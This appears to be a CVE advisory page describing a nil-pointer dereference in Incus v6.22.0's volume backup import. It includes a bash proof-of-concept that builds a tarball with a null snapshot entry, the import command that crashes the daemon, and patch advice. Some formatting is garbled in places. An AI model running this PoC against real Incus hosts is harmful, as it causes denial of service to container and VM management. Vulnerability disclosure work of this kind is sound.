Listen to this Post
The vulnerability stems from missing nil-pointer validation in Incus’s custom volume backup import logic. When an authenticated user imports a storage volume backup, the daemon parses a `index.yaml` file from the archive. This YAML includes a `volume_snapshots` array. The `CreateCustomVolumeFromBackup` function iterates over srcBackup.Config.VolumeSnapshots, a slice of pointers to snapshot structures. For each element s, the code immediately dereferences s.Name, s.Config, s.Description, s.CreatedAt, and `s.ExpiresAt` without checking if `s` is nil. The YAML unmarshaler (in Go) accepts explicit `null` entries in arrays and converts them into nil pointers. An attacker can craft a backup archive where `volume_snapshots` contains a literal `null` entry. When the daemon processes this archive, it reaches the loop, tries to access `snapshot.Name` on a nil pointer, and triggers a runtime panic (nil-pointer dereference). This crash terminates the Incus daemon, causing a denial of service. Repeated imports of such malformed archives can keep the daemon offline. The affected code resides in `backend.go` at line 7627 (around the loop). The issue requires authentication and access to the volume import feature, lowering the severity but still enabling disruption. The PoC constructs a tarball with `index.yaml` holding volume_snapshots:
</code>. Importing it via `incus storage volume import` panics the daemon, as shown in the logs. The root cause is an assumption that all slice elements are non-nil. No validation occurs before dereferencing.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Incus
Version: v6.22.0
Vulnerability: Nil-pointer dereference
Severity: Medium
date: 2026-05-04
<h2 style="color: blue;">Prediction: 2026-05-20</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Generate malformed backup archive
cat <<EOF > poc_nil_snapshot.sh
!/bin/bash
mkdir -p backup/snapshots/snap0
cat > backup/index.yaml <<EOT
name: panic-nil-snap
backend: dir
pool: default
type: custom
snapshots:
- snap0
config:
volume:
name: panic-nil-snap
type: custom
content_type: filesystem
config: {}
volume_snapshots:
- null
EOT
tar -czf exploit_null_snapshot.tar.gz backup/
rm -rf backup/
EOF
bash poc_nil_snapshot.sh
Trigger the crash
incus storage volume import default exploit_null_snapshot.tar.gz
Verify panic
journalctl -u incus --since "1 minute ago" | grep -A 10 "panic: runtime error"
Exploit:
Authenticated user crafts backup tarball with `volume_snapshots: [bash]` in index.yaml. Imports volume via incus storage volume import. Daemon dereferences nil pointer, panics, and terminates.
Protection from this CVE:
Upgrade to patched Incus version (>v6.22.0) or add nil-check before dereferencing each snapshot pointer. Apply input validation on `VolumeSnapshots` slice during backup import.
Impact:
Denial of service – remote authenticated attacker crashes Incus daemon repeatedly, making container/VM management unavailable. No data corruption or privilege escalation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
